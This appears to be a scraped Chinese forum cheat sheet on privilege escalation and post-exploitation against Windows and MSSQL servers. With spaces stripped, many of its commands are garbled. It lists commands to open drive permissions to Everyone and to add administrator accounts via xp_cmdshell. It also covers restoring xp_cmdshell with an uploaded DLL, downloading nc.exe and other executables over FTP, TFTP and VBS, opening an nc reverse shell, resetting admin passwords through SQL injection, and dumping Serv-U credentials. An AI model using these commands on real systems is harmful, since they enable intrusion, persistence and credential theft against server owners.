y-2k的

权限设置

cacls.exec:/e/t/geveryone:F#把c盘设置为everyone可以浏览

cacls.exed:/e/t/geveryone:F#把d盘设置为everyone可以浏览

cacls.exee:/e/t/geveryone:F#把e盘设置为everyone可以浏览

cacls.exef:/e/t/geveryone:F#把f盘设置为everyone可以浏览

caclsd:website/geveryone/e/t授与完全控制

caclsd:website/reveryone/e/t取消完全控制

SA加系统用户

execmaster.dbo.xp_cmdshell'netuseradminadmin/add'

execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsadmin/add'

恢复扩散

dbccaddextendedproc("sp_OACreate","odsole70.dll")

dbccaddextendedproc("xp_cmdshell","xplog70.dll")

如果恢复不了的解释:

因为管理员是直接删除dll文件，而没删除存储过程，你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程，usemaster

EXECsp_dropextendedproc'xp_cmdshell'

然后上传xplog70.dll到某个目录，例如C盘根目录，然后执行

usemasterdbccaddextendedproc('xp_cmdshell','c:xplog70.dll')

就可以使用cmdshell存储过程执行系统指令了。

MB的没想到网关都能用NB这样设..落伍啦.落伍啦

把他设置成网关看看行不行.在NBSI执行命令那里输入：echointerfaceip>ip.txt

echosetaddress"Backup"static10.90.90.157255.255.255.010.90.90.141>>ip.txt

netshexecip.txt

这样就把网关设置为10.90.90.14了，然后我们ipconfig看看是不是有网关了，

echointerfaceip>1.txt

echosetaddress"本地连接"static192.168.1.2255.255.255.0192.168.12541>>1.txt

netshexec1.txt

address"本地连接的名称"可以用ipconfig得到.staticIP地址子网掩码网关地址。

好了现在我PING下163看看能不能PING通，如图8

命令行FTP下载文件

echoopenip>11.txt

echouser>>11.txt

echopass>>11.txt

echogetnc.exe>>11.txt

echobye>>11.txt

ftp-s:11.txt

NC做反弹SHELL

在本地监听1234端口nc-vv-l-p1234

然后在NBSI执行命令那里nc-ecmd.exeip1234

改密码地

http://注入网址;updateadminsetpassword='新MD5密码'wherepassword='旧MD5密码'--[admin为表名.]

查看系统在线用户

queryuser

注销用户

logoff

D:webrar.exea-k-r-s-m1D:webzhu.rarD:web

把站点打包到zhu.rar里，

参数说明:

a添加文件到压缩文件中

-k锁定压缩文件

-s产生固体存档,这样可以增大压缩比

-r包括子目录

-m1设置压缩比

-m0存储添加到压缩文件时不压缩文件。

-m1最快使用最快方式(低压缩)

-m2较快使用快速压缩方式

-m3标准使用标准(默认)压缩方式

-m4较好使用较好压缩方式(较好压缩，但是慢)

-m5最好使用最大压缩方式(最好的压缩，但是最慢

直接D:webrar.exea-rD:webzhu.rarD:web效果一样

execxp_cmdshell'echo内容>>绝对路径'

scstopMSSQLSERVER

scconfigMSSQLSERVERstart=disabled

导SERV-U用户.和密码,不过现在版本密码加密了``

regedit/e"D:hostingwwwrootsystones_comhtdocssu.ini""HKEY_LOCAL_MACHINESOFTWAREcatsoftserv-u"

导入是regedit/sxx.reg

端口:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp

tftp-iserveripgetxx.exe

TFTP–I127.0.0.1getcommon.dllc:common.dll

VBS

--

SetxPost=createObject("Microsoft.XMLHTTP")

xPost.Open"GET","http://127.0.0.1/u.txt",0'下载文件的地址

xPost.Send()

SetsGet=createObject("ADODB.Stream")

sGet.Mode=3

sGet.Type=1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile"c:jp.exe",2

VPN

关防火和ApplicationLayerGatewayService

3389登陆

mstsc/console/v:IP:终端端口

【提权总结整理贴】相关文章：

★ 新云网站管理系统任意文件可下载漏洞

★ 开放IPC$共享

★ QQ聊天记录删除了怎么恢复 详细步骤教程

★ 几款双功能免杀超强版asp小马

★ Mysql提权方法利用

★ 用手机控制服务器的方法解密

★ linux提权用的一个技巧

★ 提权,以MySQL之名

★ php+mysql注入页面实现

★ win2003下创建永远的隐藏帐户的图文教程